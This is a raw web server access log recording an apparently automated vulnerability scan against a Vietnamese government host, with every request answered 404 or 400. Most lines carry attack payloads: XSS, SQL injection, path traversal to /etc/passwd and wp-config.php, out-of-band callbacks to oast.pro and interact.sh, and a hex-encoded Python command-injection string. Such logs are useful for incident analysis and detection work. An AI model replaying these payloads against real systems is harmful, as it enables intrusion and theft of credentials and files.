2024-01-05 05:02:26 103.153.214.94 GET /hoteldruid/visualizza_tabelle.php anno=2019&amp;id_sessione&amp;tipo_tabella=prenotazioni&amp;subtotale_selezionate=1&amp;num_cambia_pren=1&amp;cerca_id_passati=1&amp;cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 6
2024-01-05 05:02:30 103.153.214.94 POST /content/2aVH1LTlHRd8gyS1d0bUR6vT1ne - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 7
2024-01-05 05:02:33 103.153.214.94 POST /content/2aVH1LTlHRd8gyS1d0bUR6vT1ne.af.internalsubmit.json - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 7
2024-01-05 05:02:41 103.153.214.94 GET /wavemaker/studioService.download method=getContent&amp;inUrl=file///etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 8
2024-01-05 05:04:12 103.153.214.94 GET /s/2aVH1DeBXFvOxmoo4xqwt4YFgNW/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 11
2024-01-05 05:04:15 103.153.214.94 GET /s/2aVH1DeBXFvOxmoo4xqwt4YFgNW/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 05:04:32 103.153.214.94 GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php ajaxAction=getIds&amp;cfg=../../../../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 05:07:04 103.153.214.94 POST /Autodiscover/Autodiscover.xml - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 12
2024-01-05 05:08:41 103.153.214.94 POST /artifactory/ui/auth/login _spring_security_remember_me=false 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/artifactory/webapp/ 404 7 0 15
2024-01-05 05:10:22 103.153.214.94 GET / mp_idx=%22;alert(%271%27);// 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 7
2024-01-05 05:10:37 103.153.214.94 GET /index.php/component/jemessenger/box_details task=download&amp;dw_file=../../.././../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 9
2024-01-05 05:11:04 103.153.214.94 POST /search/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 10
2024-01-05 05:11:07 103.153.214.94 POST /search/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 6
2024-01-05 05:11:17 103.153.214.94 GET /ReportServer/Pages/ReportViewer.aspx - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 8
2024-01-05 05:16:01 103.153.214.94 GET /commands.inc.php searchOption=contains&amp;searchField=vuln&amp;search=search&amp;searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5(&#039;999999999&#039;),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 10
2024-01-05 05:16:16 103.153.214.94 GET /compliancepolicies.inc.php search=True&amp;searchColumn=policyName&amp;searchOption=contains&amp;searchField=antani&#039;+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 8
2024-01-05 05:17:30 103.153.214.94 GET /compliancepolicyelements.inc.php search=True&amp;searchField=antani&#039;+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&amp;searchColumn=elementName&amp;searchOption=contains 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 11
2024-01-05 05:18:05 103.153.214.94 GET /devices.inc.php search=True&amp;searchField=antani&#039;+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&amp;searchColumn=n.id&amp;searchOption=contains 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 05:18:24 103.153.214.94 GET /snippets.inc.php search=True&amp;searchField=antani&#039;+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&amp;searchColumn=snippetName&amp;searchOption=contains 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 7
2024-01-05 05:19:49 103.153.214.94 GET /auth/realms/master/protocol/openid-connect/auth scope=openid&amp;response_type=code&amp;redirect_uri=valid&amp;state=cfx&amp;nonce=cfx&amp;client_id=security-admin-console&amp;request_uri=http://cmbglsthtacjkv124nvgomd7e6r6pg9r8.oast.pro/ 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 13
2024-01-05 05:19:53 103.153.214.94 GET /backupsettings.dat - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 5
2024-01-05 05:19:53 103.153.214.94 GET /web.config.i18n.ashx l=evwve&amp;v=evwve 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 5
2024-01-05 05:19:56 103.153.214.94 GET /SWNetPerfMon.db.i18n.ashx l=evwve&amp;v=evwve 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 7
2024-01-05 05:20:16 103.153.214.94 POST /service/rapture/session - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 7
2024-01-05 05:20:20 103.153.214.94 POST /service/rest/beta/repositories/bower/group - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 62
2024-01-05 05:20:29 103.153.214.94 GET /index.php pma_servername=cmbglsthtacjkv124nvgysch8j4zmqbjn.oast.pro&amp;pma_username=2aVH1HOb63EDfILnwxMHbpcIn26&amp;pma_password=2aVH1HOb63EDfILnwxMHbpcIn26&amp;server=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 7
2024-01-05 05:20:33 103.153.214.94 GET /pma/index.php pma_servername=cmbglsthtacjkv124nvgpuwruzbt5bewt.oast.pro&amp;pma_username=2aVH1HOb63EDfILnwxMHbpcIn26&amp;pma_password=2aVH1HOb63EDfILnwxMHbpcIn26&amp;server=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 6
2024-01-05 05:20:35 103.153.214.94 GET /pmd/index.php pma_servername=cmbglsthtacjkv124nvgdgjtejw6uq4aj.oast.pro&amp;pma_username=2aVH1HOb63EDfILnwxMHbpcIn26&amp;pma_password=2aVH1HOb63EDfILnwxMHbpcIn26&amp;server=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 7
2024-01-05 05:20:39 103.153.214.94 GET /phpMyAdmin/index.php pma_servername=cmbglsthtacjkv124nvgt89rfuh71wbpz.oast.pro&amp;pma_username=2aVH1HOb63EDfILnwxMHbpcIn26&amp;pma_password=2aVH1HOb63EDfILnwxMHbpcIn26&amp;server=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 15
2024-01-05 05:20:43 103.153.214.94 GET /phpmyadmin/index.php pma_servername=cmbglsthtacjkv124nvgr3o73kt8wur6h.oast.pro&amp;pma_username=2aVH1HOb63EDfILnwxMHbpcIn26&amp;pma_password=2aVH1HOb63EDfILnwxMHbpcIn26&amp;server=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 6
2024-01-05 05:20:46 103.153.214.94 GET /_phpmyadmin/index.php pma_servername=cmbglsthtacjkv124nvgjx39yqda6q67j.oast.pro&amp;pma_username=2aVH1HOb63EDfILnwxMHbpcIn26&amp;pma_password=2aVH1HOb63EDfILnwxMHbpcIn26&amp;server=1 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 8
2024-01-05 05:22:08 103.153.214.94 POST /api/snapshots - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 12
2024-01-05 05:22:47 103.153.214.94 GET /MicroStrategyWS/happyaxis.jsp - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 9
2024-01-05 05:23:28 103.153.214.94 GET /index.php/admin/filemanager/sa/getZipFile path=/../../../../../../../etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 12
2024-01-05 05:23:36 103.153.214.94 GET /%2f%5cinteract.sh%2fa%3fb/ - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 400 0 0 14
2024-01-05 05:23:53 103.153.214.94 POST /mailingupgrade.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 11
2024-01-05 05:24:04 103.153.214.94 GET /wp-content/plugins/chopslider/get_script/index.php id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 8
2024-01-05 05:25:13 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 7
2024-01-05 05:25:58 103.153.214.94 GET /ucmdb-api/connect - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 12
2024-01-05 05:26:11 103.153.214.94 GET /awcuser/cgi-bin/vcs_access_file.cgi file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 11
2024-01-05 05:26:31 103.153.214.94 GET /index.php redirect=/\/interact.sh/ 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 6
2024-01-05 05:26:34 103.153.214.94 GET /index.php redirect=//interact.sh 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 4
2024-01-05 05:27:42 103.153.214.94 GET /does_not_exist&quot;&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&lt;img+src=x - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 400 0 0 15
2024-01-05 05:31:22 103.153.214.94 POST /v2/api/product/manger/getInfo - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 27
2024-01-05 05:32:17 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&amp;file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 14
2024-01-05 05:32:20 103.153.214.94 GET /wp-admin/admin-ajax.php action=duplicator_download&amp;file=%2F..%2Fwp-config.php 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 9
2024-01-05 05:32:33 103.153.214.94 GET / s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 7
2024-01-05 05:33:21 103.153.214.94 GET /cgi-bin/ExportAllSettings.sh - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 18
2024-01-05 05:37:25 103.153.214.94 GET /files/ldap.debug.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 14
2024-01-05 05:37:37 103.153.214.94 GET /public/login.htm type=probes 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 7
2024-01-05 05:37:40 103.153.214.94 GET /public/login.htm type=requests 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 5
2024-01-05 05:37:43 103.153.214.94 GET /public/login.htm type=treestat 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8
2024-01-05 05:38:06 103.153.214.94 GET / - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 6
2024-01-05 05:38:47 103.153.214.94 POST /ajax/api/content_infraction/getIndexableContent - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 11
2024-01-05 05:39:08 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 7
2024-01-05 05:39:38 103.153.214.94 GET /login.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 10
2024-01-05 05:39:49 103.153.214.94 GET /fw.progrss.details.php popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 10
2024-01-05 05:40:11 103.153.214.94 GET /login.php - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 5
2024-01-05 05:41:32 103.153.214.94 GET / cda&#039;&quot;&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;locale=locale=de-DE 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 9
2024-01-05 05:44:45 103.153.214.94 GET /wp-json/acf/v3/options/a id=active&amp;field=plugins 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 20
2024-01-05 05:45:51 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 17
2024-01-05 05:45:54 103.153.214.94 GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2aVH1L3X71M3b0aaD8GOiEvjQla.txt - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 10
2024-01-05 05:47:07 103.153.214.94 GET /OneView/view/center a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain) 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 10
2024-01-05 05:47:54 103.153.214.94 GET /webadmin/tools/unixlogin.php login=admin&amp;password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6d465753444646526b353561584e36575642705a466c6c5648424e4f5864794e6b465122207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&amp;timeout=5 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 14
2024-01-05 05:47:57 103.153.214.94 GET /webadmin/out - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn:8172/webadmin/admin/service_manager_data.php 404 7 0 5
2024-01-05 05:48:22 103.153.214.94 GET /avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 400 0 0 13
2024-01-05 05:48:25 103.153.214.94 GET /grafana/avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 400 0 0 7
2024-01-05 05:48:39 103.153.214.94 POST /pandora_console/ajax.php page=include/ajax/events&amp;perform_event_response=10000000&amp;target=cat+/etc/passwd&amp;response_id=1 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 8
2024-01-05 05:48:58 103.153.214.94 GET /api/experimental/latest_runs - 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 9
2024-01-05 05:49:28 103.153.214.94 GET /api/experimental/test - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 9
2024-01-05 05:49:32 103.153.214.94 GET /api/experimental/dags/example_trigger_target_dag/paused/false - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 9
2024-01-05 05:49:35 103.153.214.94 POST /api/experimental/dags/example_trigger_target_dag/dag_runs - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 7
2024-01-05 05:49:49 103.153.214.94 GET /bitrix/components/bitrix/mobileapp.list/ajax.php/ AJAX_CALL=Y&amp;items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&amp;items%5BITEMS%5D%5BTOGGLABLE%5D=test123&amp;items%5BITEMS%5D%5BID%5D=&lt;a+href=&quot;/*&quot;&gt;*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//&gt; 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 13
2024-01-05 05:49:52 103.153.214.94 GET /bitrix/components/bitrix/mobileapp.list/ajax.php/ AJAX_CALL=Y&amp;items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&amp;items%5BITEMS%5D%5BTOGGLABLE%5D=test123&amp;items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E 8172 - 203.205.9.60 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 12
2024-01-05 05:49:59 103.153.214.94 GET /kylin/api/admin/config - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 8
2024-01-05 05:51:07 103.153.214.94 POST /context.json - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 10
2024-01-05 05:53:15 103.153.214.94 GET / cffaction=get_data_from_database&amp;query=SELECT%20*%20from%20wp_users 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 8
2024-01-05 05:54:42 103.153.214.94 GET /secure/QueryComponent!Default.jspa - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 10
2024-01-05 05:55:04 103.153.214.94 POST /module/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 7
2024-01-05 05:55:07 103.153.214.94 POST /module/ - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 5
2024-01-05 05:55:10 103.153.214.94 POST /module/ - 8172 - 203.205.9.60 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172admin/view:modules/load_module:users 404 7 0 8
2024-01-05 05:55:21 103.153.214.94 GET /secure/ViewUserHover.jspa - 8172 - 203.205.9.60 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 6
2024-01-05 05:56:34 103.153.214.94 GET /auth/login to=/92874%27;alert(document.domain)//280 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 7
2024-01-05 05:57:04 103.153.214.94 GET /Devices-Config.php sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E 8172 - 203.205.9.60 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 8
